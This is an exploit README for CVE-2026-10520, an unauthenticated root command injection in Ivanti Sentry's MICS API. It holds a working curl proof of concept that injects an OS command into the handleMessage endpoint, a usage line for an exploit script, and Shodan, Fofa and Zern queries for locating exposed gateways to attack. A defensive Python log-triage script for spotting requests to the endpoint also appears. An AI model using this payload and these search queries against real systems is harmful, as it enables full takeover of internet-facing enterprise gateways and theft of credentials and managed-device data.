## https://sploitus.com/exploit?id=64AD591D-B6CF-5E92-941D-257E7A137B09
# CVE-2026-10520

[![Python](https://img.shields.io/badge/Python-3.12%2B-blue.svg)][01]
[![CVSS](https://img.shields.io/badge/CVSS-10%20CRITICAL-darkred.svg)][01]
[![License](https://img.shields.io/badge/License-SCTPL-green.svg)](./LICENSE)
[![Educational](https://img.shields.io/badge/Purpose-Educational%20Only-yellow.svg)](./LICENSE)

[Ivanti Sentry][07] (formerly MobileIron Sentry) is an enterprise security
gateway that proxies traffic between mobile devices and corporate backend
resources: email, SharePoint, and internal web applications. It enforces
*Mobile Device Management* (MDM) policies, terminates encrypted mobile
sessions, and issues certificate-based authentication for enterprise app
deployments. Sentry instances are typically internet-facing on port **8443**,
exposing the MICS (Mobile Iron Configuration Service) administration API.

**CVE-2026-10520** is an **unauthenticated OS command injection** vulnerability
affecting Ivanti Sentry **before R10.5.2, R10.6.2, and R10.7.1**
(CVSSv3.1: **10 Critical**, listed in CISA KEV). The flaw is in the **MICS API**
endpoint `/mics/api/v2/sentry/mics-config/handleMessage`, which accepts
**XML-wrapped** system commands via a URL-encoded `message` **POST** body
without any authentication or input validation. An attacker who reaches a
vulnerable endpoint can execute arbitrary OS commands as **root**, obtaining
full control of the host, including decrypted enterprise traffic, stored
credentials, and all managed mobile-device data.

## PoC

```bash
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Connection: close" \
  --data-urlencode "message=execute system /configuration/system/commandexec 1id"
```
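For defenders, a log-triage sketch that flags requests to the `handleMessage` endpoint in reverse-proxy access logs; it is an added example, not part of the original repository. The combined log format, the `10.20.0.0/24` management range, and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import posixpath
import re
from urllib.parse import unquote

# Endpoint named in the advisory text, lowercased for comparison.
MICS_PATH = "/mics/api/v2/sentry/mics-config/handlemessage"
# Assumption: only this management range should ever reach the MICS API.
ADMIN_NETS = [ipaddress.ip_network("10.20.0.0/24")]
# Assumption: logs are in common/combined access-log format.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [12/Mar/2026:04:10:59 +0000] "GET /favicon.ico HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/Mar/2026:04:11:02 +0000] "POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1" 200 312',
    '198.51.100.9 - - [12/Mar/2026:04:12:40 +0000] "POST /mics//api/v2/sentry/mics-config/%68andleMessage HTTP/1.1" 403 0',
    '10.20.0.15 - - [12/Mar/2026:09:00:01 +0000] "POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1" 200 88',
]

def normalize(target):
    """Drop the query string, decode percent-escapes, collapse '//' and dot segments."""
    path = unquote(target.split("?", 1)[0])
    return posixpath.normpath("/" + path.lstrip("/")).lower()

def scan(lines):
    """Return (severity, ip, timestamp, method, status) per request to the MICS endpoint."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or normalize(m["target"]) != MICS_PATH:
            continue
        try:
            trusted = any(ipaddress.ip_address(m["ip"]) in n for n in ADMIN_NETS)
        except ValueError:  # hostname or garbage in the client field
            trusted = False
        if trusted:
            severity = "info"      # expected admin traffic, keep for audit
        elif m["status"].startswith("2"):
            severity = "high"      # endpoint answered an outside caller
        else:
            severity = "medium"    # outside request that was refused or failed
        findings.append((severity, m["ip"], m["ts"], m["method"], m["status"]))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding)
```

Access logs rarely record POST bodies, so the match is on the normalized path alone; any hit from outside the management range warrants review regardless of status.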

## Usage

```txt
python CVE-2026-10520-X7.py
```

* [Zern][04]    : `title:"Ivanti System Manager: Sign In"`
* [Fofa][05]    : `body="sentry" && body="System Manager" && port="8443"`, `title="Ivanti System Manager: Sign In"`, `icon_hash=="1407597555"`
* [Shodan][06]  : `http.html:"Ivanti Standalone Sentry System Manager" port:8443` , `http.title:Ivanti port:8443`, `http.html:"Ivanti" http.html:"Sentry" port:8443`

## Resources

* [OpenCVE: Root-Level RCE via OS Command Injection in Ivanti Sentry][01]
* [NIST: CVE-2026-10520 Detail][02]
* [Ivanti Sentry: Official Product Page][07]

## Authors

* ErrorInside // SCT

## License

SCT-PL

[01]: https://app.opencve.io/cve/CVE-2026-10520
[02]: https://nvd.nist.gov/vuln/detail/CVE-2026-10520
[04]: https://zern.io
[05]: https://en.fofa.info
[06]: https://www.shodan.io
[07]: https://www.ivanti.com/products/secure-connectivity/sentry